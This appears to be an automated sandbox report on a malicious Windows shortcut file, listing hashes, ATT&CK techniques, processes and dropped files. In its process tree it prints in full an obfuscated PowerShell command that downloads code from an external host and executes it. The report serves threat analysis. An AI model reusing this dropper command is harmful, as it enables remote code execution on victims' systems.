5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848

General

Target

5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848.lnk
Size

1KB
MD5

ae44dfe179f7ab8400c90b2d208ff313
SHA1

7f87bfe1edeccd7a01ff20519e92ba54e7d8e4a8
SHA256

5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848
SHA512

5b451ef8b7043300bd9809285f8f283f2bda096d06f80560e48c89e5992981f0b5de20ed8a3fcdf3e8ff5e4be5672791a713e68a39571d25683db02f5720922a

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1h982d.bemostake.space/test.txt

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

5 2716 powershell.exe
7 2716 powershell.exe
9 2716 powershell.exe
Downloads MZ/PE file
Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

2716 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

ajbs50ul.batutox_x86_x64.exe

pid process

2840 ajbs50ul.bat
2644 utox_x86_x64.exe
Loads dropped DLL 7 IoCs

Processes:

powershell.exeWerFault.exe

pid process

2716 powershell.exe
2716 powershell.exe
2484 WerFault.exe
2484 WerFault.exe
2484 WerFault.exe
2484 WerFault.exe
2484 WerFault.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2716 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exe

pid process

2716 powershell.exe
2716 powershell.exe
2716 powershell.exe
2716 powershell.exe
2716 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2716 powershell.exe

flow	pid	process
5	2716	powershell.exe
7	2716	powershell.exe
9	2716	powershell.exe

pid	process
2716	powershell.exe

pid	process
2840	ajbs50ul.bat
2644	utox_x86_x64.exe

pid	process
2716	powershell.exe
2716	powershell.exe
2484	WerFault.exe
2484	WerFault.exe
2484	WerFault.exe
2484	WerFault.exe
2484	WerFault.exe

pid	process
2716	powershell.exe

pid	process
2716	powershell.exe
2716	powershell.exe
2716	powershell.exe
2716	powershell.exe
2716	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2716	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cmd.execmd.exepowershell.exeutox_x86_x64.exe

description	pid	process	target process
PID 2360 wrote to memory of 572	2360	cmd.exe	cmd.exe
PID 2360 wrote to memory of 572	2360	cmd.exe	cmd.exe
PID 2360 wrote to memory of 572	2360	cmd.exe	cmd.exe
PID 572 wrote to memory of 2716	572	cmd.exe	powershell.exe
PID 572 wrote to memory of 2716	572	cmd.exe	powershell.exe
PID 572 wrote to memory of 2716	572	cmd.exe	powershell.exe
PID 2716 wrote to memory of 2840	2716	powershell.exe	ajbs50ul.bat
PID 2716 wrote to memory of 2840	2716	powershell.exe	ajbs50ul.bat
PID 2716 wrote to memory of 2840	2716	powershell.exe	ajbs50ul.bat
PID 2716 wrote to memory of 2644	2716	powershell.exe	utox_x86_x64.exe
PID 2716 wrote to memory of 2644	2716	powershell.exe	utox_x86_x64.exe
PID 2716 wrote to memory of 2644	2716	powershell.exe	utox_x86_x64.exe
PID 2644 wrote to memory of 2484	2644	utox_x86_x64.exe	WerFault.exe
PID 2644 wrote to memory of 2484	2644	utox_x86_x64.exe	WerFault.exe
PID 2644 wrote to memory of 2484	2644	utox_x86_x64.exe	WerFault.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\5089ec3c865e6c490ee27dff0b7dbe81ff882fbbeebf280c213ed9914ade6848.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2360
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
    3⤵
    - Blocklisted process makes network request
    - Deletes itself
    - Loads dropped DLL
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2716
  - - C:\Users\Public\ajbs50ul.bat
      "C:\Users\Public\ajbs50ul.bat"
      4⤵
      Executes dropped EXE
      PID:2840
  - - C:\Users\Admin\AppData\Local\Temp\utox_x86_x64.exe
      "C:\Users\Admin\AppData\Local\Temp\utox_x86_x64.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2644
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2644 -s 200
        5⤵
        Loads dropped DLL
        
        PID:2484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Local\Temp\utox_x86_x64.exe

Filesize
4.7MB

MD5
e9679980aa73cfc7cf00f3da7949c661

SHA1
53ba9e3a3a10ae0e72df4b3632d8d4135eb540b6

SHA256
d7bd224b2ef0014c679046c917becfface5f5aba2fbdb7dd3c17fe964c3cee97

SHA512
002aac023e1bbe3bbbf153ebc5462970aa98c84badea6bc1b8d333c98a5ed91540928b8848a9928607e12c0a1296a12424b2c2b0753e23afeb537249f04db8bc

Download Submit
\Users\Public\ajbs50ul.bat

Filesize
2.2MB

MD5
8837df25aabc4fad85e851aca192f714

SHA1
c4fbd38356b7ee16eaf21deb83170bbcb0fe566a

SHA256
741cee2c6f6f8ee8a54923fa2a0c88085cede35bdc2e95b1b9f1800e894e6c19

SHA512
93f712ae3ca726b090df270feb1421ea98778260b7fe309e06ac3887b396d3dc8ab41655ec7d15a57cac8b467cca0395a52ef965765a26c9597f6512fdad88e2

Download Submit
memory/2644-70-0x0000000000400000-0x000000000097B000-memory.dmp

Filesize
5.5MB

Download
memory/2716-43-0x000007FEF50F0000-0x000007FEF5A8D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-44-0x000007FEF50F0000-0x000007FEF5A8D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-45-0x000007FEF50F0000-0x000007FEF5A8D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-46-0x000007FEF50F0000-0x000007FEF5A8D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-40-0x000007FEF53AE000-0x000007FEF53AF000-memory.dmp

Filesize
4KB

Download
memory/2716-52-0x000007FEF50F0000-0x000007FEF5A8D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-42-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2716-58-0x000007FEF50F0000-0x000007FEF5A8D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-41-0x000000001B890000-0x000000001BB72000-memory.dmp

Filesize
2.9MB

Download
memory/2840-71-0x000000013F990000-0x000000013FB72000-memory.dmp

Filesize
1.9MB

Download

Analysis

Sharing